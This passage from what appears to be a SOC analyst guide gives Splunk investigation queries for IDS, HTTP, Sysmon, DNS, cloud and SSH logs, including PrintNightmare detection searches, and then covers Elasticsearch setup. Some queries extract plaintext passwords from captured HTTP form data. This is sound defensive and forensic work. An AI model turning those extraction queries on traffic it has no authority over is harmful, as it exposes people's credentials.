an alert; hence we are interested in displaying the IDS
alerts. A key field you want to focus on is
alert.signature
Scenario One
Say you want to see all IDS [suricata] alerts triggered by
a machine infected with an Advanced Persistent Threat.
The infected machine's IP is [40.80.148.42]
 index=dataset domain.com src=40.80.148.42
 sourcetype=suricata
Looking for executable files caught in Suricata IDS logs
 index=* sourcetype=suricata .exe
Looking through endpoints to which executable files were
downloaded or uploaded. Make sure to change ip values
 index=botsv1 sourcetype=suricata (dest="ip1"
 OR dest_ip="ip2") .exe
Looking through endpoints to which executable files were
uploaded through http POST request. Make sure to change
ip values by specifying the endpoints using IP and domain
 index=botsv1 sourcetype=suricata
 (dest=domain.com OR dest="ip1")
 http.http_method=POST .exe
#TIP
Using the stats command, we can get a count for each
combination of signature and signature_id. Because the
signature and the id are likely unique, that may not be
necessary in this case, but it provides a good way to see
the description and the associated ID of the signature
accompanied by the count.
Example
 index=dataset sourcetype=suricata
 alert.signature=*keyword* | stats count by
 alert.signature alert.signature_id | sort
 count
Scenario 2
This scenario focuses on the point we mentioned earlier
about extracting IDS alerts.
We can display all IDS alerts
 index=dataset sourcetype=suricata | stats
 values(alert.signature)
After we display alerts, we narrow down our efforts on a
specific alert that was triggered by a malware infection.
 index=dataset sourcetype=suricata
 "alert.signature"="ET MALWARE Win32/Trickbot
 Data Exfiltration"
And then we can extract relevant details and IOCs about
the malware such as the source and destination IPs
 index=dataset sourcetype=suricata
 "alert.signature"="ET MALWARE Win32/Trickbot
 Data Exfiltration" | table src, dest
Parsing http traffic
Looking through http traffic with domain name as a
keyword
 index=dataset domain.com
 sourcetype=stream:http
Parsing http traffic for a specific source ip
 index=botsv1 src=192.168.250.70
 sourcetype=stream:http
Investigating http traffic where the response status equals
[200] and counting the number of hits per URL
  index=* dest=192.168.250.70
 sourcetype=stream:http status=200 | stats
 count by uri | sort - count
Investigating IIS logs
 index=* sourcetype=iis
Investigating HTTP post requests and displaying
authentication information
 index=* sourcetype=stream:http
 http_method=POST form_data=*username*passwd*
 | table form_data
Using regular expressions to display usernames and
passwords in http requests
 index=* sourcetype=stream:http
 form_data=*username*passwd*
 | rex field=form_data "passwd=(?
 <userpassword>\w+)"
 | head 10
 | table userpassword
Using regular expressions to display usernames and
passwords in http requests and display the count of the
password length
 index=* sourcetype=stream:http
 form_data=*username*passwd*
 | rex field=form_data "passwd=(?
 <userpassword>\w+)"
 | eval lenpword=len(userpassword)
 | table userpassword lenpword
Converting the password to lowercase with the lower function
 index=* sourcetype=stream:http
 form_data=*username*passwd*
 | rex field=form_data "passwd=(?
 <userpassword>\w+)"
 | eval lenpword=len(userpassword)
 | search lenpword=6
 | eval password=lower(userpassword)
Sorting by time
 index=* sourcetype=stream:http
 form_data=*username*passwd*
 dest_ip=192.168.250.70 src=40.80.148.42
 | rex field=form_data "passwd=(?
 <userpassword>\w+)"
 | search userpassword=*
 | table _time uri userpassword
Searching for specific password
[1]
 index=* sourcetype=stream:http | rex
 field=form_data "passwd=(?<userpassword>\w+)"
 | search userpassword=batman | table _time
 userpassword src
[2]
 index=* sourcetype=stream:http
 | rex field=form_data "passwd=(?
 <userpassword>\w+)"
 | search userpassword=batman
 | transaction userpassword
 | table duration
Looking for executable files transferred through [http]
[1]
 index=* sourcetype=stream:http .exe
[2]
 index=* sourcetype=stream:http uri=*.exe |
 stats values(uri)
Looking through GET requests for a specific domain
 index="dataset" domain.com
 sourcetype="stream:http" http_method=GET
Looking through visited websites from a source ip with an
exclusion list.
 index="dataset" ip sourcetype="stream:HTTP"
 NOT (site=*.microsoft.com OR site=*.bing.com
 OR site=*.windows.com OR site=*.atwola.com OR
 site=*.msn.com OR site=*.adnxs.com OR
 site=*.symcd.com OR site=*.folha.com.br)
 | dedup site
 | table site
Displaying URL values between a client and a server. This
is useful if you are looking for patterns of web application
attacks or OWASP attacks such as SQL injection, IDOR, File
inclusion or directory traversal. All these attacks happen
over URLs
 index=* src=10.0.0.10 dest=10.0.0.11
 sourcetype=http | stats values(uri)
Parsing general network traffic
Counting the number of requests initiated from the
network [domain.com] and sorting them by IP address.
 index=dataset domain.com sourcetype=stream* |
 stats count(src_ip) as Requests by src_ip |
 sort - Requests
Looking for an image transferred between two ips
 index=dataset dest=23.22.63.114 "image.jpeg"
 src=192.168.250.70
Looking through specific file extensions on a host. Useful
for investigating what file(s) was encrypted by a
ransomware
 index="dataset" host="MACLORY-AIR13" (*.ppt OR
 *.pptx)
Parsing Sysmon events
Looking for an executable name [name] in sysmon events
 index=dataset name.exe
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational
Looking for process creation events with a named
executable
 index=dataset name.exe
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational EventCode=1
Listing the MD5 hashes of the named executable
 index=dataset name.exe CommandLine=name.exe
 | stats values(MD5)
Searching with the hostname of a PC. Replace hostname
with its value
 index=botsv1 hostname
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational
Looking through scheduled tasks activity.
 index="dataset" schtasks.exe
 sourcetype="XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational"
 | dedup ParentCommandLine
 | dedup CommandLine
 | table ParentCommandLine CommandLine
Parsing Fortinet Firewall logs
Looking for hits to malicious websites and providing an ip
address
 index=dataset sourcetype=fgt_utm
 "192.168.250.70" category="Malicious Websites"
Looking through processes that changed a file's creation
time. Useful to look for files left by a malicious
executable such as [ransomware]. Remember to add a double
[\] in the path.
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=hostname EventCode=2
 TargetFilename="pathtofile" | stats
 dc(TargetFilename)
USB attacks
USB records can be found in the Windows registry. You
can also use keywords if you have info about the USB
 index=dataset sourcetype=winregistry keyword
Sorting by the host and object
 index=dataset sourcetype=winregistry keyword |
 table host object data
Finding Sysmon events for the infected system on an
external drive, showing oldest events first. The external
drive letter is [d:]
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=targetpcname "d:\\" |
 reverse
Refining our search to find [D:] only in CommandLine and
ParentCommandLine. We use parentheses with OR so that we
can look for a reference to [D:] in either the
CommandLine field or the ParentCommandLine field. We then
table both fields along with _time and sort oldest to
newest.
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=targetpcname
 (CommandLine="*d:\\*" OR
 ParentCommandLine="*d:\\*") | table _time
 CommandLine ParentCommandLine | sort _time
Finding the vendor name of a USB inserted into a host
 index="dataset" host=hostname usb
File sharing
File sharing events can be found in sysmon
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=hostname
If we have information about the file server's address or
domain name, we can use it
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=hostname
 src="filserver.com"
By adding the stats command we can quickly see the
number of network connections the host has made.
 index=dataset
 sourcetype=XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational host=hostname
 src="filserver.com" | stats count by dest_ip |
 sort - count
Identifying the Hostname of the File Server
We can do that by specifying its ip address.
 index=dataset
 sourcetype="XmlWinEventLog:Microsoft-Windows-
 Sysmon/Operational" ip
Parsing DNS
Scenario [1]
It's useful to find C2 domains when investigating a
compromised network or machine.
By using conditions like AND, OR and NOT to narrow down
search criteria, we can quickly exclude domains that we
don't have an interest in. Keep in mind AND is implied
between conditions.
Rather than writing our search such that the query does
not equal x and the query does not equal y, we can use
parenthesis to group a number of conditions in this manner
(query=x OR query=y) and then place a NOT statement in
front of the parenthesis to apply to the entire group of
query values. Either syntax is acceptable.
Example is below. We can look through A records for a
specific ip and ignore a list of domains.
 index=dataset sourcetype=stream:DNS
 src=192.168.250.100 record_type=A NOT
 (query{}=*.microsoft.com OR query{}=*.bing.com
 OR query{}=*.windows.com
 OR query{}=*.msftncsi.com) | stats count by
 query{} | sort 10 - count
By tabling the result set and then using the reverse
command we get the earliest time and query at the top of
the list.
 index=dataset sourcetype=stream:DNS
 src=192.168.250.100 record_type=A NOT
 (query{}=*.microsoft.com OR
 query{}=*.waynecorpinc.local OR
 query{}=*.bing.com OR query{}=isatap OR
 query{}=wpad OR query{}=*.windows.com OR
 query{}=*.msftncsi.com) | table _time query{}
 src dest | reverse
#TIP
To understand the relationship between processes started
and their parent/children, we can use the table command
to see the time along with the process that was
executed, its associated parent process command, the
process ID and parent process ID. Using the reverse
command moves the first occurrence to the top. The IDs
provide the linkage between these different processes.
While Sysmon can show the immediate parent process that
spawned another process in a single event, it cannot
show an entire chain of processes being created.
Scenario [2]
Sometimes we want statistical information about the DNS
connections. One of these is the round trip time, or RTT.
This metric measures the time from when the DNS query
is sent until the answer is received.
Say we want to calculate RTT sent to a specific
destination IP
 index=* sourcetype=dns dest=10.10.10.10 |
 stats avg(rtt) as avgrtt | eval
 avgrtt=round(avgrtt,5)
You can use RTT for network troubleshooting as well, to
detect delays in DNS responses. We can sort   rtt   in
reverse order and then use   _time   to check when the
highest delays occurred.
 index=* sourcetype=dns dest=10.10.10.10 | sort
 - rtt | table _time, rtt
Or we can group RTT by one minute slot and then calculate
the average.
 index=* sourcetype=dns dest=10.10.10.10 |
 bucket _time span=1m | stats avg(rtt) by _time
Email Activity
Examining smtp events with keywords such as email
address and domain name
 index="dataset" sourcetype=stream:smtp
 email@email.com domain.com
Finding zip attachments
 index="dataset" sourcetype="stream:smtp" *.zip
We can also list emails by subject and sender
 index="dataset" sourcetype="stream:smtp" |
 table mailfrom, subject
Then we can examine the emails/events generated by a
specific sender
 index="dataset" sourcetype="stream:smtp"
 mailfrom=test@test.com
FTP events
Looking through downloaded files
 index="botsv2" sourcetype="stream:ftp"
 method=RETR
 | reverse
AWS Events
Listing out the IAM users that accessed an AWS service
(successfully or unsuccessfully)
 index="dataset" sourcetype="aws:cloudtrail"
 IAMUser
 | dedup user
 | table user
Looking through AWS API activity that has occurred without
MFA (multi-factor authentication)
 index="dataset" sourcetype="aws:cloudtrail"
 NOT tag::eventtype="authentication"
 "userIdentity.sessionContext.attributes.mfaAut
 henticated"=false
Looking through events related to an S3 bucket being made
publicly accessible.
 index="dataset" sourcetype="aws:cloudtrail"
 eventType=AwsApiCall eventName=PutBucketAcl
 | reverse
Looking through files that were successfully uploaded into
the S3 bucket
 index="dataset"
 sourcetype="aws:s3:accesslogs" *PUT* | reverse
Looking through full process usage information on an AWS
instance. Useful for finding coin-mining activity
 index="dataset" sourcetype="PerfmonMk:Process"
 process_cpu_used_percent=100
 | table _time host process_name
 process_cpu_used_percent
Finding the IAM user access key that generates the most
distinct errors when attempting to access IAM resources
 index="dataset" sourcetype="aws:cloudtrail"
 user_type="IAMUser" errorCode!="success"
   eventSource="iam.amazonaws.com"
 | stats dc(errorMessage) by
 userIdentity.accessKeyId
Given a key, we can look through the unauthorized
attempts to create a key for a specific resource.
 index="dataset" sourcetype="aws:cloudtrail"
 userIdentity.accessKeyId="AKIAJOGCDXJ5NW5PXUPA
 " eventName=CreateAccessKey
Given a key, we can look through the unauthorized
attempts to describe an account.
 sourcetype="aws:cloudtrail"
 userIdentity.accessKeyId="AKIAJOGCDXJ5NW5PXUPA
 "
   eventName="DescribeAccountAttributes"
Symantec endpoint protection events
Investigating coin mining attacks and finding the signature
ID
[1]
 index="dataset" sourcetype="symantec:*" *coin*
 | table _time CIDS_Signature_ID
[2]
 index="dataset" sourcetype="symantec:*" *coin*
O365 Events
Looking through file upload events to OneDrive
 index="dataset"
 sourcetype="ms:o365:management"
 Workload=OneDrive Operation=FileUploaded
 | table _time src_ip user object UserAgent
WIN event logs
Finding antivirus alerts. In the example below we use
Symantec antivirus. Useful for finding malicious executables
 index="dataset"
 source="WinEventLog:Application"
 SourceName="Symantec AntiVirus" *Frothly*
Looking through users created
 index="dataset" source="wineventlog:security"
 EventCode=4720
Finding groups a user is assigned to
 index="dataset" source="wineventlog:security"
 svcvnc EventCode=4732
Listing URLs accessed through [PowerShell]
 index="dataset" source="WinEventLog:Microsoft-
 Windows-PowerShell/Operational" Message="*/*"
 | rex field=Message "\$t\=[\'\"](?<url>
 [^\'\"]+)"
 | table url
Linux events
Looking through users added along with their passwords
 index="dataset" (adduser OR useradd)
 source="/var/log/auth.log"
Osquery
Looking through users added along with their passwords
[Linux]
 index="botsv3" sourcetype="osquery:results"
 useradd
Finding information about a process listening on port
[1337]
 index="dataset" 1337
 sourcetype="osquery:results"
 "columns.port"=1337
SSH Events
When parsing SSH events, we mainly aim to detect failed
SSH logins, which indicate possible brute-force attacks, or
successful SSH logins for auditing purposes.
Below will list successful logins from   10.0.0.10
 index=* src=10.0.0.10 sourcetype=ssh
 auth_success=true
Likewise, for failed logins you can change   auth_success
to   false   in the query above.
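Building on that, a possible brute-force hunt is to count failed logins per source and keep only sources above a threshold; a sketch using the same sourcetype and fields as above (the threshold of 5 is an arbitrary assumption):
 index=* sourcetype=ssh auth_success=false
 | stats count by src
 | where count > 5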
Detecting PrintNightmare vulnerability
Identifies Print Spooler adding a new Printer
Driver
 source="WinEventLog:Microsoft-Windows-
 PrintService/Operational"
 EventCode=316 category = "Adding a printer
 driver" Message = "*kernelbase.dll,*" Message
 = "*UNIDRV.DLL,*" Message = "*.DLL.*"
 | stats count min(_time) as firstTime
 max(_time) as lastTime by OpCode EventCode
 ComputerName Message
Detects spoolsv.exe with a child process of
rundll32.exe
| tstats count min(_time) as firstTime
max(_time) as lastTime from
datamodel=Endpoint.Processes where
Processes.parent_process_name=spoolsv.exe
Processes.process_name=rundll32.exe by
Processes.dest Processes.user
Processes.parent_process
Processes.process_name Processes.process
Processes.process_id
Processes.parent_process_id
Detects spoolsv.exe writing a DLL into the spool
drivers directory
| tstats count FROM
datamodel=Endpoint.Processes where
Processes.process_name=spoolsv.exe by _time
Processes.process_id Processes.process_name
Processes.dest
| rename "Processes.*" as *
| join process_guid _time
    [| tstats count min(_time) as firstTime
max(_time) as lastTime FROM
datamodel=Endpoint.Filesystem where
Filesystem.file_path="*\\spool\\drivers\\x64\\
*" Filesystem.file_name="*.dll" by _time
Filesystem.dest Filesystem.file_create_time
Filesystem.file_name Filesystem.file_path
    | rename "Filesystem.*" as *
     | fields _time dest file_create_time
 file_name file_path process_name process_path
 process]
 | dedup file_create_time
 | table dest file_create_time, file_name,
 file_path, process_name
Detects when a new printer plug-in has failed
to load
 source="WinEventLog:Microsoft-Windows-
 PrintService/Admin" ((ErrorCode="0x45A"
 (EventCode="808" OR EventCode="4909"))
 OR ("The print spooler failed to load a plug-
 in module" OR "\\drivers\\x64\\"))
   | stats count min(_time) as firstTime
 max(_time) as lastTime by OpCode EventCode
 ComputerName Message
Creating Alerts
The scenarios discussed above cover different cases of
cyber incident investigation. The queries can be run in
real time as you investigate, or you can save them as
alerts.
Sometimes, we want to be alerted if a certain event
happens, such as, if the amount of failed logins on a
single account reaches a threshold, it indicates a brute
force attempt, and we would like to know as soon as it
happens. In that case, creating alerts is the way to go.
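For instance, the saved search behind such a brute-force alert might look like the sketch below (EventCode 4625 is a failed Windows logon; the index name and threshold are assumptions):
 index="dataset" source="wineventlog:security" EventCode=4625
 | stats count by Account_Name
 | where count > 5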
Alerts are the most common way analysts can monitor the
network for cyber incidents.
To create an alert, while running any query choose save
as alert
Next, we see that the alert type we are setting up is
scheduled.
This means that Splunk will run this search as per the
schedule, and if the trigger condition is satisfied, an alert
will be raised.
Trigger conditions define the conditions when the alert will
be raised.
Let's say we raise the alert when the login count of our
user is more than 5. In that case, we will use the
'Number of Results' option and set the 'is greater than'
option to 5. We can trigger 5 alerts for the 5 login times,
or we can just trigger a single alert for exceeding this
count.
The 'Throttle' option lets us limit the alerts by not raising
an alert in the specified time period if an alert is already
triggered. This can help reduce alert fatigue, which can
overwhelm analysts when there are too many alerts.
The final option here is for Trigger Actions. This option
allows us to define what automated steps Splunk must
take when the alert is triggered. For example, we might
want Splunk to send an email to the SOC email account in
case of an alert.
Reporting With Splunk
Reports help analysts automate the process of running
data searches at specific time intervals.
For example, multiple searches can be scheduled to run at
the start of every shift automatically without any user
interaction. The searches will be saved and reports will be
created for each search operation.
Reports can be accessed from the main menu. Below we
can see a list of reports already saved in Splunk.
If we want to run a new search using the same query as
the one in a report, we can use the 'Open in Search'
option.
To create a new report, we can run a search and use the
Save As option to save the search as a report.
Creating Dashboards
Dashboards are frequently designed to provide a concise
summary of the most significant data points. They are
useful for presenting facts and statistics to management,
such as the quantity of events in a specific time period,
or for helping SOC analysts determine where to
concentrate, like locating spikes and declines in data
sources that would point to an increase in, say,
unsuccessful login attempts. Dashboards are mostly used
to present a brief visual summary of the information that
is accessible.
Dashboards can be created by navigating through the
menu, clicking on Dashboards and then clicking on the
button   create new dashboard .
After filling in the relevant details, such as the name and
permissions, we can choose one of the two options for
dashboard creation through Classic Dashboards or
Dashboard Studio.
We can then load the results of a previously run report
into the dashboard to view them as a visualization.
We can then select the type of visualization we want.
ELK
Definition
The Elastic Stack is a collection of open source
components linked together to help users take data from
any source, in any format, and search, analyze, and
visualize it in real time.
Purpose of ELK
The Elastic Stack (Elasticsearch, Logstash & Kibana) is
mainly used for:
     Data analytics.
     Security and threat detection.
     Performance monitoring.
Methodology
ELK can be overwhelming at first but if you understand
what you want to achieve from the beginning, you will
have no issues moving forward.
I am a data analyst, how should I start?
If you intend to use the Elastic Stack for data analysis,
you most probably have your datasets ready in text
format. Remember that Elasticsearch is a full-text search
engine, so your dataset should be text.
You can't analyze relational databases with the Elastic Stack.
Steps to start:
     Have your dataset ready.
     Follow the steps below to install Elasticsearch,
     Logstash and Kibana.
     After successful installation, head over to Kibana and
     create an index (explained below) that will store
     your data.
     Depending on the dataset you have, you may need to
     create an   index template         and   pipeline   to
     appropriately parse your data according to its type.
     Use   Logstash   to manually supply your dataset via
     the command line and ingest it to your previously
     created index.
     Navigate to   Management-->Dev Tools-->Console
     to start executing queries to search and manipulate
     your data.
     If you are looking to create visualizations, you will
     need to create a      data view      for your index in
     Kibana then you can create a         visualization
I am a security engineer, how should I
start?
If you are in a SOC, most likely your data consists mainly
of web logs, server logs, network logs, etc., which means
you will rely heavily on Elasticsearch to parse your logs
into appropriate fields.
Steps to start:
     Follow the steps below to install Elasticsearch and
     Kibana. Install Logstash if you want to collect logs
     from network devices (firewall, IPS, etc.).
     After successful installation, head over to Kibana and
     create an index (explained below) that will store
     your data.
     Use either   elastic agents          or   Beats   to start
     collecting log data from your monitored endpoints.
     Again, I prefer to use   Logstash   only if I want to
     collect from network devices.
     Create a   data view     for your index to be able to
     start searching the logs using        Discover section        in
     Kibana.
Components of elastic stack
Before we dig deeper into each component, keep in mind
you can use all elastic stack components without the need
to install locally by using the cloud version.
Check the link below to get started:
 https://www.elastic.co/cloud/elasticsearch-
 service/signup?page=docs&placement=docs-body
Elastic Search
Elasticsearch is a full-text search and analytics engine
used to store JSON-formatted documents. It is an important
component used to store, analyze, and perform correlation
on data.
It is built on top of Apache Lucene and provides a scalable
solution for full-text search, structured querying, and
data analysis.
Elasticsearch supports RESTFul API to interact with the
data.
Purposes of Using Elastic Search
     Ingesting, storing, and searching through large
     volumes of data.
     Getting relevant search results from textual data.
     Aggregating data.
     Acting on data in near real time.
     Working with unstructured/semi-structured data
Elasticsearch may not be suitable for:
     Handling relational datasets.
     Performing ACID transactions.
Elastic Search Index
When users want to store data (or documents) on
Elasticsearch, they do so in an index. An index on
Elasticsearch is a location to store and organize related
documents. They don't all have to be the same type of
data, but they generally have to be related to one
another.
Indexing is the action of writing documents into an
Elasticsearch index. Elasticsearch will index individual
document fields to make them searchable as part of the
indexing request.
Components of an Index
An index is made up of primary shards. Primary shards
can be replicated into replica shards to achieve high
availability. Each shard is an instance of a Lucene index
with the ability to handle indexing and search requests.
The primary shard can handle both read
and write requests, while replica shards are read-only.
When a document is indexed into Elasticsearch, it is
indexed by the primary shard before being replicated to
the replica shard. The indexing request is only
acknowledged once the replica shard has been
successfully updated, ensuring read consistency across
the Elasticsearch cluster. Primary and replica shards are
always allocated on different nodes, providing redundancy
and scalability.
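You can verify how primary (p) and replica (r) shards are distributed across nodes using the _cat API, for example:
 GET _cat/shards?v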
Creating an Index
An Elasticsearch index can be created using the Create
Index API.
You can create your first index to store documents and
data by opening Kibana and navigating into Management---
>Dev Tools and select Console to run your commands.
You can create an index by running the below command:
 PUT my-index
To view the index you created, run the following:
 GET my-index
To view all the indices on the cluster, run the following:
 GET _cat/indices
You can specify custom index settings in the create index
request. The following request
creates an index with three primary shards and one
replica:
 PUT my-other-index
 {
     "settings": {
       "index": {
         "number_of_shards": 3,
           "number_of_replicas": 1
           }
      }
 }
Storing data in an index
Data stored in an index are called documents.
Elasticsearch documents are JSON objects that are stored
in indices. JSON documents in Elasticsearch consist of
fields (or key/value pairs).
Indexing a document in Elasticsearch is simple and can be
done by specifying the document ID:
 # Index a document with _id 1
 PUT my-index/_doc/1
 {
 "year": 2021,
 "city": "Damascus",
 "country": "Syria",
 "population_M": 5.2
 }
 # Index a document with _id 2
 PUT my-index/_doc/2
 {
 "year": 2022,
 "city": "Damascus",
 "country": "Syria",
 "population_M": 4.82
 }
You can retrieve all the documents in the index by running
the following command:
 GET my-index/_search
To maximize indexing/search performance, shards should
be evenly distributed across nodes when possible to take
advantage of underlying node resources. Each shard
should hold between 30 GB and 50 GB of data, depending
on the type of data and how it is used.
Mappings
All the fields in a document need to be mapped to a data
type in Elasticsearch. Mappings specify the data type for
each field and also determine how the field should be
indexed and analyzed for search. Mappings are like
schemas when defining tables in a SQL database.
Mappings can be declared explicitly or generated
dynamically.
If you don't specify field mappings explicitly while
indexing the fields, Elasticsearch will automatically and
dynamically create index mappings for you.
When a document containing new fields is indexed,
Elasticsearch will look at the value of the field in question
to try and guess the data type it should be mapped to.
Once a field has been mapped in a given index, it cannot
be changed. If subsequent documents contain conflicting
field values (a string value instead of an integer, for
example), the indexing request will not succeed.
To fix an incorrect or suboptimal index mapping, the data
in the index needs to be reindexed into a different index
with properly defined mappings.
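As a sketch, this can be done with the Reindex API after creating the new index with the correct mappings (the destination index name here is hypothetical):
 POST _reindex
 {
     "source": { "index": "my-index" },
     "dest": { "index": "my-index-fixed" }
 }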
In the index we created above containing documents
about city information, you can explicitly specify the field
mappings using   type , so the complete request will
look similar to the one below:
 PUT my-explicit-index
 {
 "mappings": {
     "properties": {
         "year": {
             "type": "integer"
             },
         "city": {
             "type": "keyword"
             },
         "country": {
             "type": "keyword"
             },
         "population_M": {
             "type": "float"
             },
         "attractions": {
             "type": "text"
             }
         }
     }
 }
Then we index a document in the new index:
 POST my-explicit-index/_doc
 {
     "year": "2021",
     "city": "Melbourne",
     "country": "Australia",
     "population_M": 4.936,
     "attractions": "Queen Victoria markets,
 National Gallery of Victoria, Federation
 square"
 }
More details on mappings and data types below:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/mapping-types.html
Creating Data View
To start visualizing and searching the index with the data
you created, we will need to create a data view:
     Open Kibana and navigate to Stack Management.
     Click on Data Views under the Kibana section and
     click on Create data view.
     Type in   my-index   as the name of the data view and
     click Next step.
Data views on Kibana map to one or more indices on
Elasticsearch and provide Kibana with
information on fields and mappings to enable visualization
features.
Elastic Search Node
An Elasticsearch node is a single running instance of
Elasticsearch. A single physical or virtual machine can run
multiple instances or nodes of Elasticsearch, assuming it
has sufficient resources to do so.
Elasticsearch nodes perform a variety of roles within the
cluster. The roles that a node performs can be granularly
controlled as required.
Elastic Search Clusters
A group of Elasticsearch nodes can form an Elasticsearch
cluster. When a node starts up, it initiates the cluster
formation process by trying to discover the master-eligible
nodes. A list of master-eligible nodes from previous
cluster state information is gathered if available.
Elastic Search Installation and
configuration
Installation on Windows
Elasticsearch can be installed on Windows using the
Windows   .zip archive. This comes with
an   elasticsearch-service.bat command   which will
set up Elasticsearch to run as a service.
First download from the link below:
    https://artifacts.elastic.co/downloads/elastic
    search/elasticsearch-8.13.4-windows-x86_64.zip
Open command line interpreter and execute the below
commands:
 cd C:\elasticsearch-8.13.4
 .\bin\elasticsearch.bat
Or you can simply execute the .bat file after unzipping
the archive.
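If you prefer to run Elasticsearch as a Windows service instead, the bundled script supports install and start subcommands, for example:
 .\bin\elasticsearch-service.bat install
 .\bin\elasticsearch-service.bat start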
When starting Elasticsearch for the first time, security
features are enabled and configured by default. The
following security configuration occurs automatically:
     Authentication and authorization are enabled, and a
     password is generated for the           elastic    built-in
     superuser.
     Certificates and keys for TLS are generated for the
     transport and HTTP layer, and TLS is enabled and
     configured with these keys and certificates.
     An enrollment token is generated for Kibana, which is
     valid for 30 minutes.
The password for the    elastic           user and the enrollment
token for Kibana are output to your terminal.
For more installation options on Windows, check
the below reference:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/current/zip-windows.html
Installation on Linux
Elasticsearch is available as a          .tar.gz   archive for Linux
and MacOS. The Linux archive for Elasticsearch v8.13.4
can be downloaded and installed as follows:
 wget
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-linux-
 x86_64.tar.gz
 wget
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-linux-
 x86_64.tar.gz.sha512
 shasum -a 512 -c elasticsearch-8.13.4-linux-
 x86_64.tar.gz.sha512
 tar -xzf elasticsearch-8.13.4-linux-
 x86_64.tar.gz
 cd elasticsearch-8.13.4/
Run the following command to start Elasticsearch from the
command line:
 ./bin/elasticsearch
When starting Elasticsearch for the first time, security
features are enabled and configured by default. The
following security configuration occurs automatically:
     Authentication and authorization are enabled, and a
     password is generated for the      elastic   built-in
     superuser.
     Certificates and keys for TLS are generated for the
     transport and HTTP layer, and TLS is enabled and
     configured with these keys and certificates.
     An enrollment token is generated for Kibana, which is
     valid for 30 minutes.
The password for the   elastic           user and the enrollment
token for Kibana are output to your terminal.
For more installation options on Linux and
MacOs, check the below reference:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/current/targz.html
Download and install archive for MacOS
The MacOS archive for Elasticsearch v8.13.4 can be
downloaded and installed as follows:
 curl -O
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-darwin-
 x86_64.tar.gz
 curl
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-darwin-
 x86_64.tar.gz.sha512 | shasum -a 512 -c -
 tar -xzf elasticsearch-8.13.4-darwin-
 x86_64.tar.gz
 cd elasticsearch-8.13.4/
Installation with docker
If you are installing on-premises, it's best to use Docker:
 docker network create elastic
 docker pull
 docker.elastic.co/elasticsearch/elasticsearch:
 8.13.4
 docker run --name es01 --net elastic -p
 9200:9200 -p 9300:9300 -e
 "discovery.type=single-node" -it
 docker.elastic.co/elasticsearch/elasticsearch:
 8.13.4
When installing for the first time, security configuration
will be displayed, including the default password for the
elastic user.
Copy the credentials along with the enrollment tokens
which are needed with Kibana later.
Copying the SSL certificate:
 docker cp
 es01:/usr/share/elasticsearch/config/certs/htt
 p_ca.crt .
Execute the below command to ensure that Elasticsearch
is up and running:
 curl --cacert http_ca.crt -u
 elastic:$ELASTIC_PASSWORD
 https://localhost:9200
Installation using Debian Package
Execute below commands:
 wget
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-amd64.deb
 wget
 https://artifacts.elastic.co/downloads/elastic
 search/elasticsearch-8.13.4-amd64.deb.sha512
 shasum -a 512 -c elasticsearch-8.13.4-
 amd64.deb.sha512
 sudo dpkg -i elasticsearch-8.13.4-amd64.deb
When installing Elasticsearch, security features are
enabled and configured by default. When you install
Elasticsearch, the following security configuration occurs
automatically:
     Authentication and authorization are enabled, and a
     password is generated for the     elastic   built-in
     superuser.
     Certificates and keys for TLS are generated for the
     transport and HTTP layer, and TLS is enabled and
     configured with these keys and certificates.
The password and certificate and keys are output to your
terminal.
Then you can run Elasticsearch:
 ./bin/elasticsearch
You can then configure Elasticsearch to start when the
system starts:
 systemctl enable elasticsearch.service
 systemctl start elasticsearch.service
Checking the status of Elasticsearch:
 systemctl status elasticsearch.service
For more installation options using the Debian
package, check the below reference:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/current/deb.html#install-deb
Elastic Search Configuration
Elastic Search Config Files
Config files can be found under the
/etc/elasticsearch      directory and include:
   elasticsearch.yml :       This is the main configuration
   file for Elasticsearch. It contains various settings
   that determine the behavior of Elasticsearch, such
   as network configuration, cluster settings, node
   settings, and paths for data storage and logging.
   Sample config file is shown below:
# All nodes in a cluster should have the same
name
cluster.name: lab-cluster
# Set to hostname if undefined
node.name: node-a
# Port for the node HTTP listener
http.port: 9200
# Port for node TCP communication
transport.tcp.port: 9300
# Filesystem path for data directory
path.data: /mnt/disk/data
# Filesystem path for logs directory
path.logs: /mnt/disk/logs
# List of initial master eligible nodes
cluster.initial_master_nodes:
# List of other nodes in the cluster
discovery.seed_hosts:
# Network host for server to listen on
network.host: 0.0.0.0
   jvm.options :    The   jvm.options     file contains
   JVM (Java Virtual Machine) configuration settings
   for Elasticsearch. It allows you to specify
   parameters related to memory allocation, garbage
   collection, and other JVM options. It is recommended
   to set the minimum and maximum heap size to the
   same value to avoid resource-intensive memory
   allocation processes during node operations. It is
   also a good idea to allocate no more than half the
   available memory on a node to the JVM heap; the
   remaining memory will be utilized by the operating
    system and the filesystem cache. For example, heap
    sizes can be configured using the below variables,
    which can be set in the config file:
-Xms4g # Minimum heap size
-Xmx4g # Maximum heap size
    log4j2.properties :
   The log4j2.properties                file is the configuration
   file for Elasticsearch’s logging system, Log4j. It
   defines how Elasticsearch logs different types of
   messages and sets log levels for different
   components. You can modify this file to configure
   the log output format, log rotation, and other
   logging-related settings.
   users :   The    users   file is used for configuring user
   authentication and authorization in Elasticsearch. It
   allows you to define users, roles, and their
   respective permissions.
   roles.yml       and roles_mapping.yml : These              files
   are used in   conjunction with the users file to
   define roles and their mappings to users and
   privileges. Roles provide a way to group users and
